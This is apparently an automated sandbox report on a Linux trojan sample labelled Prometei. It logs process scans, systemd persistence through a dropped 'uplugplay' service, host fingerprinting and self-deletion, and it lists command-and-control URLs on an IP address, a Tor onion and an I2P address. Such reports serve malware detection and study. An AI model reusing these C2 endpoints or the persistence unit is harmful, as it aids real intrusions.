    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/113/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/113/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/234/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/234/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1335/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1335/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1698/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1698/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/114/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/114/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/235/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/235/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1334/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1334/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1576/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1576/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2302/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2302/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/115/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/115/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/236/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/236/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/116/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/116/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/237/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/237/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/117/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/117/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/118/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/118/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/910/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/910/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/119/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/119/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/912/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/912/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/10/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/10/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2307/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2307/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/11/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/11/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/918/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/918/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/12/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/12/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/13/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/13/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/14/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/14/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/15/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/15/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/16/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/16/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/17/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/17/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/18/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/18/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1594/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1594/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/120/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/120/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/121/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/121/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1349/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1349/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/122/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/122/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/243/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/243/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/123/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/123/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/2/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/124/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/124/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/4/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/4/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/125/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/125/cmdlineJump to behavior
    Source: /tmp/na.elf (PID: 6206)Shell command executed: sh -c "pgrep na.elf"Jump to behavior
    Source: /tmp/na.elf (PID: 6211)Shell command executed: sh -c "pidof na.elf"Jump to behavior
    Source: /tmp/na.elf (PID: 6215)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
    Source: /tmp/na.elf (PID: 6219)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
    Source: /tmp/na.elf (PID: 6225)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
    Source: /tmp/na.elf (PID: 6232)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
    Source: /tmp/na.elf (PID: 6244)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
    Source: /tmp/na.elf (PID: 6262)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
    Source: /tmp/na.elf (PID: 6269)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6292)Shell command executed: sh -c hostnamectlJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6297)Shell command executed: sh -c hostnamectlJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6433)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6436)Shell command executed: sh -c uptimeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6441)Shell command executed: sh -c "uname -a"Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6445)Shell command executed: sh -c dmidecodeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6453)Shell command executed: sh -c uptimeJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6457)Shell command executed: sh -c "uname -a"Jump to behavior
    Source: /bin/sh (PID: 6207)Pgrep executable: /usr/bin/pgrep -> pgrep na.elfJump to behavior
    Source: /bin/sh (PID: 6216)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
    Source: /bin/sh (PID: 6226)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
    Source: /bin/sh (PID: 6245)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/sh (PID: 6263)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
    Source: /bin/sh (PID: 6282)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Reads from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Reads from proc file: /proc/statJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Reads from proc file: /proc/meminfoJump to behavior
    Source: /tmp/na.elf (PID: 6203)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
    Source: /tmp/na.elf (PID: 6203)File written: /usr/sbin/uplugplayJump to dropped file
    Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/na.elf (PID: 6203)File: /usr/sbin/uplugplayJump to dropped file
    Source: /bin/sh (PID: 6437)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
    Source: /bin/sh (PID: 6446)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
    Source: /tmp/na.elf (PID: 6203)File: /tmp/na.elfJump to behavior
    Source: na.elfSubmission file: segment LOAD with 7.6054 entropy (max. 8.0)
    Source: na.elfSubmission file: segment LOAD with 7.943 entropy (max. 8.0)
    Source: uplugplay.12.drDropped file: segment LOAD with 7.6054 entropy (max. 8.0)
    Source: uplugplay.12.drDropped file: segment LOAD with 7.943 entropy (max. 8.0)
    Source: /usr/sbin/uplugplay (PID: 6286)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/bin/pgrep (PID: 6207)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6226)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6438)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6454)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /tmp/na.elf (PID: 6203)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/gpg (PID: 6237)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/gpg (PID: 6239)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/gpg (PID: 6243)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/gpg (PID: 6247)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6283)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/uname (PID: 6442)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/uname (PID: 6458)Queries kernel information via 'uname': Jump to behavior
    Source: /lib/systemd/systemd-hostnamed (PID: 6299)Queries kernel information via 'uname': Jump to behavior

    Language, Device and Operating System Detection

    barindex
    Source: /bin/sh (PID: 6437)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
    Source: /bin/sh (PID: 6446)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
    Source: /bin/sh (PID: 6442)Uname executable: /usr/bin/uname -> uname -aJump to behavior
    Source: /bin/sh (PID: 6458)Uname executable: /usr/bin/uname -> uname -aJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		Valid AccountsWindows Management Instrumentation1
    Systemd Service    		1
    Systemd Service    		1
    Masquerading    		1
    OS Credential Dumping    		1
    Security Software Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting    		Boot or Logon Initialization Scripts1
    File and Directory Permissions Modification    		LSASS Memory14
    System Information Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Hidden Files and Directories    		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Obfuscated Files or Information    		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    File Deletion    		LSA SecretsInternet Connection DiscoverySSHKeylogging1
    Proxy    		Scheduled TransferData Encrypted for Impact

    Malware Configuration

    No configs have been found

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1652748 Sample: na.elf Startdate: 31/03/2025 Architecture: LINUX Score: 92 77 152.36.128.18, 58304, 58306, 80 NCRENUS United States 2->77 79 109.202.202.202, 80 INIT7CH Switzerland 2->79 81 3 other IPs or domains 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 Antivirus / Scanner detection for submitted sample 2->87 89 2 other signatures 2->89 11 na.elf 2->11         started        15 systemd uplugplay 2->15         started        17 fwupd gpg 2->17         started        19 7 other processes 2->19 signatures3 process4 file5 73 /usr/sbin/uplugplay, ELF 11->73 dropped 93 Found Tor onion address 11->93 95 Drops files in suspicious directories 11->95 97 Sample deletes itself 11->97 21 na.elf sh 11->21         started        23 na.elf sh 11->23         started        25 na.elf sh 11->25         started        29 6 other processes 11->29 27 uplugplay 15->27         started        signatures6 process7 process8 31 sh pgrep 21->31         started        33 sh pidof 23->33         started        35 sh pgrep 25->35         started        37 uplugplay sh 27->37         started        39 sh pidof 29->39         started        41 sh pgrep 29->41         started        43 sh pidof 29->43         started        45 3 other processes 29->45 process9 47 sh uplugplay 37->47         started        file10 75 /etc/CommId, ASCII 47->75 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 5 other processes 47->56 process11 process12 58 sh dmidecode 50->58         started        61 sh dmidecode 52->61         started        63 sh hostnamectl 54->63         started        65 sh hostnamectl 56->65         started        67 sh uptime 56->67         started        69 sh uname 56->69         started        71 2 other processes 56->71 signatures13 91 Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection) 58->91

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    na.elf100%AviraLINUX/GM.Agent.JQ

    Dropped Files

    SourceDetectionScannerLabelLink
    /usr/sbin/uplugplay100%AviraLINUX/GM.Agent.JQ
    /usr/sbin/uplugplay47%ReversingLabsLinux.Trojan.Generic

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://152.36.128.18/cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673100%Avira URL Cloudmalware

    Domains and IPs

    Download Network PCAP: filteredfull

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://152.36.128.18/cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673true
    • Avira URL Cloud: malware
    		unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onina.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpfalse
      		high
      http://upx.sf.netna.elf, uplugplay.12.drfalse
        		high
        http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgina.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpfalse
          		high
          https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgina.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpfalse
            		high
            http://152.36.128.18/cgi-bin/p.cgina.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpfalse
              		high
              http://dummy.zero/cgi-bin/prometei.cgina.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                		high
                http://152.36.128na.elf, uplugplay.12.drfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  152.36.128.18
                  		unknownUnited States
                  		81NCRENUStrue
                  109.202.202.202
                  		unknownSwitzerland
                  		13030INIT7CHfalse
                  199.232.38.49
                  		unknownUnited States
                  		54113FASTLYUSfalse
                  91.189.91.43
                  		unknownUnited Kingdom
                  		41231CANONICAL-ASGBfalse
                  91.189.91.42
                  		unknownUnited Kingdom
                  		41231CANONICAL-ASGBfalse

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  152.36.128.18na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=8&i=0HWN0G2585X97X1U
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=9&i=9TCT0M2CLA7NS29C
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=40&i=9N99649NGF6OSORZ
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=13&i=UPM6985GQ620630A
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=13&i=8711V51Q45KM5B9L
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FASTLYUShttps://www.facebook.com/61574623328720/posts/122103808232820777Get hashmaliciousUnknownBrowse
                  • 151.101.46.59
                  https://orgfarm-4ccb539e27-dev-ed.develop.my.salesforce-sites.com/Get hashmaliciousUnknownBrowse
                  • 199.232.89.229
                  Bootstrapper.exeGet hashmaliciousSheetRatBrowse
                  • 185.199.109.133
                  Bootstrapper.exeGet hashmaliciousSheetRatBrowse
                  • 185.199.108.133
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 199.232.90.49
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 199.232.90.49
                  l7vmra.elfGet hashmaliciousUnknownBrowse
                  • 199.232.90.49
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 199.232.90.49
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 199.232.90.49
                  http://APP.ITGet hashmaliciousUnknownBrowse
                  • 199.232.89.229
                  CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 91.189.91.42
                  INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 109.202.202.202
                  NCRENUSna.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 152.36.128.18

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  Process:/usr/sbin/uplugplay
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):16
                  Entropy (8bit):3.625
                  Encrypted:false
                  SSDEEP:3:CTWbcn:C6Yn
                  MD5:DD4B5DEE3EEDC81F3B2C8F621531A01D
                  SHA1:7C10BD1E9BD129C6FF880360D81CAEB35076A3E1
                  SHA-256:963C3584C05C8EBE126500FD54A001516740B03220FE95AACA9C08CE59D1810A
                  SHA-512:14858A48F3B18B5F878E3DAEBAFBD64B2601B3E2B2C8FBF6400E03AC5FEF026AAF698F8FAA953422D39816EFFE706EAD00DD84EBA263A7FB6127A97E88A120D0
                  Malicious:true
                  Reputation:low
                  Preview:W40DBT2U1D37V673
                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):76
                  Entropy (8bit):3.7627880354948586
                  Encrypted:false
                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                  Process:/tmp/na.elf
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):145
                  Entropy (8bit):4.769509838572339
                  Encrypted:false
                  SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                  MD5:8CA62D1F47880BCE036C2956C9B7B272
                  SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                  SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                  SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                  Process:/tmp/na.elf
                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                  Category:dropped
                  Size (bytes):435932
                  Entropy (8bit):7.942821475319444
                  Encrypted:false
                  SSDEEP:6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgP:25WOSACZSV6eKRH5EPiamb4DsDwwcf
                  MD5:6573A24653020E43E6B1334876E9E365
                  SHA1:C37494F055C96A1C382926296EBC0667E6C765D8
                  SHA-256:8AE62082B05FF343AF8C51805259620512262B298E244F10C36982489DF633FD
                  SHA-512:50347053D710404731C46A6DDDA9BF4415B7192972EAF032212C391CB2A36E2197AD0C4439A1A464B5709170AE30AEB32147A49FE700040FD20FE449FABFBD9E
                  Malicious:true
                  Yara Hits:
                  • Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 47%
                  Reputation:low
                  Preview:.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O
                  Process:/usr/bin/gpg
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.108694969562842
                  Encrypted:false
